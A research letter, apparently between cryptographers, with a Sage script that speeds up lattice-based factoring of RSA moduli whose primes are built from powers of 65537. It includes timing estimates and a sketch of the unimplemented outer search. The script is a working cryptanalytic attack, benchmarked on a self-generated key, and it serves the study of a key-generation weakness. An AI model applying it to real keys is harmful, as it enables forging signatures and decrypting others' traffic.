Hi Matúš, Marek, and Petr,

Thanks for the feedback, and in particular for pointing out the limited range of primes shown in your 2016 paper. We still think this counts as operating from public information. :-)

Here are some speedups to the "divisors in residue classes" calculation. This Sage script is now slightly faster than your announced Haswell speed: typically 5% to 25% faster, depending on N. We used Sage 8.0 compiled under Ubuntu 16.04. Sage 8.0 uses fplll 5.1.0 for LLL and MPIR 3.0.0 for integer arithmetic.

One of the speedups implemented here is "chaining". This means taking the LLL-reduced matrix for powers of wu+Hx and multiplying it by a matrix of binomial coefficients (or actually by the square of that matrix). This corresponds to replacing u with u+vH (or actually u+2vH), moving from the interval [u-vH,u+vH] to a subsequent interval. Applying LLL to the product of matrices is very fast: the product is almost LLL-reduced already. Taking larger H reduces the number of intervals, saving time. Of course if H grows too large then the algorithm might fail. (A small self-contained check of the binomial-matrix substitution appears just before the script below.)

If the "gap" calculation in this script is correct, then "guaranteed True" in the output means that H is guaranteed to work for this N. Experimentally, taking slightly larger H is still quite reliable. The dependence on N arises because comparing N to the limited range of primes usually implies an even more limited range for the divisors of that specific N. The graphs in your 2016 USENIX paper say that the primes are usually in an even narrower interval; focusing on factoring those N's would allow further speedups.

As one expects for this type of algorithm, the matrix columns are known to be multiples of 1, H, H^2, ... Arithmetic would be considerably faster if these weights were divided out. This would require an API tweak to the LLL library to specify these weights, and a minor tweak inside the library.

At a lower level, the integer arithmetic is not optimized to the extent demonstrated in papers on, e.g., fast ECC. Further speedups are clearly possible. As a starting point, simply replacing MPIR with GMP might save some time (or lose some time; we haven't benchmarked these).

The values of "smooth" and "k" below are obtained from a search through many possibilities, taking account of the experimentally observed cost of LLL etc., so the values should be readjusted if the cost changes.

We didn't implement the outer search through powers of 65537 modulo v (a sketch appears after the script). To guarantee checking only 50% of the powers in the worst case, it's important to first compute the (easy) discrete log of N modulo v and then search exponents between floor(log/2) and ceil((log+order)/2). The "avgyearsx4" output by the script is for running through all powers, so the worst case is 50% of that and the average case is 25%.
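As a quick self-contained check of the chaining substitution described above: row j of the binomial-coefficient matrix holds the coefficients of (x+1)^j, so right-multiplying a row of polynomial coefficients by the matrix substitutes x+1 for x. In the script below, where column i carries an implicit weight of H^i, the same product substitutes x+H, and the squared matrix substitutes x+2H, matching the step u += 2*H*v. The following few lines (with toy values m and poly, not taken from the script) verify the substitution:

# toy check of the chaining matrix; m and poly are arbitrary choices here
R.<x> = ZZ[]
m = 5
shift1 = matrix(ZZ,[[binomial(j,i) for i in range(m)] for j in range(m)])
poly = 3*x^4 - 7*x^2 + 2
c = vector(ZZ,poly.padded_list(m))
assert R(list(c*shift1)) == poly(x+1)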
---Dan and Tanja

from sage.doctest.util import Timer
ttry = Timer()
t = Timer()

# generate a key of the target form: primes built from powers of 65537 mod L
L = 27771430913146044712156219115012732149015337058745243774375474371978395728107173008782747458575903820497344261101333156469136833289328084229401057505005215261077328417649807720533310592783171487952296983742789708502518237023426083874832018749447215424764928016413509553872836856095214672430
L *= 701 # if 701 is included
g = Mod(65537,L)
pmin = 12*2^1020
pmax = 13*2^1020
proof.arithmetic(False) # do not bother proving primality
t.start()
u = lift(g^randrange(L))
while True:
    p = u + randrange(ceil(pmin/L),floor(pmax/L)) * L
    if p.is_prime(): break
print 'time for first prime',t.stop().cputime
t.start()
u = lift(g^randrange(L))
while True:
    q = u + randrange(ceil(pmin/L),floor(pmax/L)) * L
    if q.is_prime(): break
print 'time for second prime',t.stop().cputime
n = p * q
print 'public key',n

# parameters found by searching many possibilities (see above)
smooth,k,H = 41902660800,5,7*2^461
m = 2*k+1
print 'smooth',smooth
print 'multiplicity',k
print 'lattice rank',m
print 'Hbits',H.nbits()
print 'H',H

# the "gap" calculation: gap > 0 guarantees that H works for this n
def lg(x): return log(1.0 * x) / log(2.0)
lggamma = lg(m)/(2.0*k) + lg(2*H)*(m-1.0)/(2.0*k) + lg(n)*((k+1.0)/(2.0*m)-1)
gap = lg(pmin) - lg(n) - lggamma
print 'gap',gap
print 'guaranteed',gap > 0

# v: product of the primes l dividing L where 65537 has order dividing smooth
def smoothorder(l): return smooth % Mod(g,l).multiplicative_order() == 0
v = prod(l for l,e in factor(L) if smoothorder(l))
print 'v',v
u = p % v # cheat: use the secret p, since the outer search is not implemented
print 'p residue class',u

ttry.start()
# comparing n to the limited prime range narrows the range further
pmin = max(pmin,ceil(n / pmax))
pmax = min(pmax,floor(n / pmin))
pradius = (pmax - pmin) // 2
print 'n-dependent pradius bits',pradius.nbits()

R.<x> = ZZ[]
u += floor((pmin + H * v - u) / v) * v
# now pmin-v < u-H*v <= pmin

t.start()
wu = lift(u/Mod(v,n))
f = wu+H*x
fpowers = [f^0]
for j in range(k): fpowers += [fpowers[j] * f]
print 'fpowers time',t.stop().cputime,'bits',[fi.nbits() for fi in fpowers[k].coefficients(sparse=False)]

# first k rows: n and f,f^2,...,f^(k-1), reduced as they are stacked
X = matrix([n])
for i in range(1,k):
    t.start()
    X = X.augment(vector(ZZ,i))
    X = X.stack(vector(ZZ,fpowers[i].coefficients(sparse=False)))
    X = X.LLL(delta=0.3,early_red=True,use_siegel=True)
    print 'miniLLL time',t.stop().cputime,'bits',[[Mji.nbits() for Mji in Mi] for Mi in X]

# remaining k+1 rows: shifts x^(i-k)*f^k, scaled by H^(i-k)
X = n * X
t.start()
for i in range(k,m):
    X = X.augment(vector(ZZ,i))
    X = X.stack(vector(ZZ,[0]*(i - k) + (H^(i-k)*fpowers[k]).coefficients(sparse=False)))
X = X.LLL(delta=0.6,early_red=True,use_siegel=True)
print 'bigLLL time',t.stop().cputime,'bits',[[Mji.nbits() for Mji in Mi] for Mi in X]
numLLL = 1

# chaining: right-multiplying by shift2 replaces x by x+2H, i.e. u by u+2vH
shift1 = matrix([[binomial(j,i) for i in range(m)] for j in range(m)])
shift2 = shift1*shift1

t.start()
factored = false
while True:
    # search u-Hv,...,u+Hv in steps of v
    # i.e. search u+vs with s being -H,...,H
    M0 = X[0]
    Q0 = sum(ZZ(z/H^i)*x^i for i,z in enumerate(M0))
    Qroots = Q0.roots(ring=ZZ)
    for r,multiplicity in Qroots:
        if u+v*r > 0:
            g = gcd(n,u+v*r)
            if g > 1 and g < n:
                if not factored:
                    print '----- successful factorization',[g,n/g]
                    factored = True
                    # could abort at this point but want to benchmark failure case
    u += 2*H*v
    if u-H*v > pmax: break
    X *= shift2
    X = X.LLL(delta=0.6,early_red=True,use_siegel=True)
    numLLL += 1
print 'scan time',t.stop().cputime,'numLLL',numLLL

timetry = ttry.stop().cputime
print 'avgyearsx4',timetry * smooth / (86400 * 365.25)
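For concreteness, here is a sketch of the outer search described before the script; it is not implemented or benchmarked as part of the timings above. The names outer_search and attempt are illustrative only: attempt(u) stands for running the per-residue-class computation above with candidate class u mod v, returning a factor on success and None on failure. discrete_log is Sage's generic discrete-logarithm routine, which is fast here because the order of 65537 mod v is smooth.

# sketch of the (unimplemented) outer search; attempt() is a hypothetical
# wrapper around the per-residue-class computation in the script above
def outer_search(n,v,attempt):
    g = Mod(65537,v)
    order = g.multiplicative_order()
    logn = discrete_log(Mod(n,v),g,ord=order) # the easy discrete log of n mod v
    # log(p)+log(q) is logn or logn+order, so one of log(p),log(q) always
    # lies in this window of about order/2 exponents (50% worst case)
    e,emax = floor(logn/2),ceil((logn+order)/2)
    while e <= emax:
        result = attempt(lift(g^e)) # candidate residue class of a prime mod v
        if result is not None: return result
        e += 1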